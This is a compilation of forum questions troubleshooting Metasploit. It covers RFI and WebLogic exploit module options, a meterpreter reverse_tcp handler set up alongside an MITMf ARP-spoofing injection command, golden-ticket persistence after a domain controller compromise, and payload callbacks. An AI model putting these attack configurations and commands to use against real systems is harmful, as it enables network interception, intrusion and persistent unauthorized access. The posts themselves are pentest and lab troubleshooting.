Metasploit Exploitation with Virtual Hosts (PHP_Include Exploit)

I am currently trying to build an example of a host vulnerable to Remote File Inclusion vulnerabilities. I have a docker application which hosts 3 vulnerable websites, and in order to access them I have my hosts file set up as follows:

192.168.56.101    Website1.com
192.168.56.101    Website2.com
192.168.56.101    Website3.com

Website1.com has an RFI vulnerability hosted at Website1.com/settings.php?file=XX where the file parameter has the Remote File Inclusion.

Now, I want to demonstrate getting a Meterpreter shell via Metasploit using the php_include exploit, under (unix/webapp/php_include). I have used this exploit many times in the past, however not with virtual hosting, and I can’t get it to work. Currently my Basic Options are configured as follows:

   Name      Current Setting                                                      Required  Description
   ----      ---------------                                                      --------  -----------
   HEADERS                                                                        no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   PATH      /                                                                    yes       The base directory to prepend to the URL to try
   PHPRFIDB  /usr/share/metasploit-framework/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /settings.php?file=XXpathXX                                          no        The URI to request, with the include parameter changed to XXpathXX
   POSTDATA                                                                       no        The POST data to send, with the include parameter changed to XXpathXX
   Proxies                                                                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    192.168.56.101                                                       yes       The target address range or CIDR identifier
   RPORT     80                                                                   yes       The target port (TCP)
   SRVHOST   0.0.0.0                                                              yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   80                                                                   yes       The local port to listen on.
   SSL       false                                                                no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                                                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                                                        no        The URI to use for this exploit (default is random)
   VHOST     Website1.com                                                         no        HTTP server virtual host

I receive the following output:

[*] Started reverse TCP handler on 192.168.56.102:4443
[-] 192.168.56.101:80 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:80).
[*] Exploit completed, but no session was created.

So I have set it as a virtual host, but to me it looks like Metasploit is trying to connect directly to the RHOST still; maybe I am wrong?

Can anyone advise on how to get this working on virtual hosts?

Thank you

Metasploit Starts attacking multiple targets, results in “address is already in use”

I am attempting to pentest multiple Weblogic servers, however, when I “run” or “exploit” or even “exploit -J”, metasploit begins to attack multiple targets at once, which results in “address is already in use”

msf5 exploit(multi/misc/weblogic_deserialize_unicastref) > run
[*] Exploiting target 192.168.27.24
[*] Exploiting target 192.168.27.25
[*] Started reverse TCP handler on 192.168.27.10:4444
[*] Exploiting target 192.168.27.26
[-] Handler failed to bind to 192.168.27.10:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 192.168.27.26:7001 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

Here are my options

msf5 exploit(multi/misc/weblogic_deserialize_unicastref) > show options

Module options (exploit/multi/misc/weblogic_deserialize_unicastref):

Name     Current Setting                                Required  Description
----     ---------------                                --------  -----------
RHOSTS   file:/tmp/msf-db-rhosts-20190415-21066-ez3gp8  yes       The target address range or CIDR identifier
RPORT    7001                                           yes       The target port (TCP)
SRVHOST  0.0.0.0                                        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080                                           yes       The local port to listen on.
SSL      false                                          no        Negotiate SSL for incoming connections
SSLCert                                                 no        Path to a custom SSL certificate (default is randomly generated)

Payload options (cmd/unix/reverse_python):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  192.168.27.10    yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
SHELL  /bin/bash        yes       The system shell to use.

Exploit target:

Id  Name
--  ----
0   Unix

Any ideas what I might be doing wrong?

MITMF Is not connecting Metasploit (HTTP Injection)

I am attempting to inject a malicious payload into an HTTP request. I own a personal LAMP server, a Kali VM and the most WindowsXP VM imaginable, and everything is on my network and legal. I have been following this tutorial.

I ran metasploit with the following

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 8843
exploit -j

When watching the video, Metasploit says

[*] Starting the payload handler... 

On my end, it starts by saying that, then brings me back to the console. Odd, but whatever I guess.

Now I am trying to run mitmf in a different terminal window

sudo ./mitmf.py --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.244 --filepwn 

Now this is the error message I am receiving from mitmf.

    [*] MITMf v0.9.8 - 'The Dark Side'
    |
    |_ Net-Creds v1.0 online
    |_ Spoof v0.6
    |  |_ ARP spoofing enabled
    |_ FilePwn v0.3
    |  |_ BDFProxy v0.3.2 online
    2018-07-17 02:23:27 [ARPpoisoner] Restoring connection 192.168.1.244 <-> 192.168.1.1 with 2 packets per host
    [Msfrpc] Error connecting to Metasploit: HTTPConnectionPool(host='127.0.0.1', port=55552): Max retries exceeded with url: /api/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7fd9b7772290>: Failed to establish a new connection: [Errno 111] Connection refused',))

I did some googling and I found this thread.

https://github.com/byt3bl33d3r/MITMf/issues/343

I followed his 2 command instructions and started the whole process over again with no luck. I even tried changing the LPORT to 55552 but that failed as well. I am not an expert with Metasploit so I wouldn’t even begin to know what to look for. How can I further troubleshoot this?

MetaSploit db_import IP Address List

I have confirmed that msfconsole is connected to the database, and I have issued the following commands…

msf5 > db_import /home/user/hosts
[*] Successfully imported /home/user/hosts
msf5 > hosts

Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

The list of IP addresses is vanilla

192.168.2.34
192.168.2.35
192.168.2.36
192.168.2.37
192.168.2.38

Any ideas what I am doing wrong?

Use Kerberos Golden Ticket with Metasploit

Having compromised a domain controller during testing, I now wish to create persistent domain admin access. Also, operational security is important for me as I don’t want to be logging into network hosts using domain admin credentials.

Having generated a Kerberos golden ticket, I am able to get a SYSTEM cmd shell on domain joined hosts on the network with Impacket’s psexec.py, without having to use administrator credentials.

However I would like to use the tools available within meterpreter with this access.
Is there any way I can use this generated Kerberos ticket with metasploit?

i get no meterpreter in ubuntu metasploit

Guys, if anyone knows how to help! I’m using Ubuntu 16.4 LTS. I installed msf and everything works fine; I have the latest version and it connects just fine with the db. My problem is that when I create a payload.exe, send it to my Windows machine and click on it, I get no connection. I did everything right. At first I thought it was a firewall problem, so I encoded the payload and disabled it, and I tried on an old OS like XP with no security, and it’s the same. I think the problem is that my Ubuntu is not connecting to the host somehow, I don’t know, because when I use setoolkit for phishing, for example, I get no returned login info. I was working with Parrot in the past and everything was good and easy. Does anyone know how to fix that, please? I’ve been searching for solutions for a week.

Metasploit – Installation problems on arch linux

I am trying to get metasploit up and running on my arch based linux system (Manjaro). While this might sound trivial I am having much more trouble than I expected. I pulled the latest version from the AUR using yay metasploit. It “installed” successfully. However I can’t seem to start it. There is no command “metasploit” or “msf” … What am I supposed to do? I checked the github page of metasploit which has installer scripts, however these don’t work on arch linux.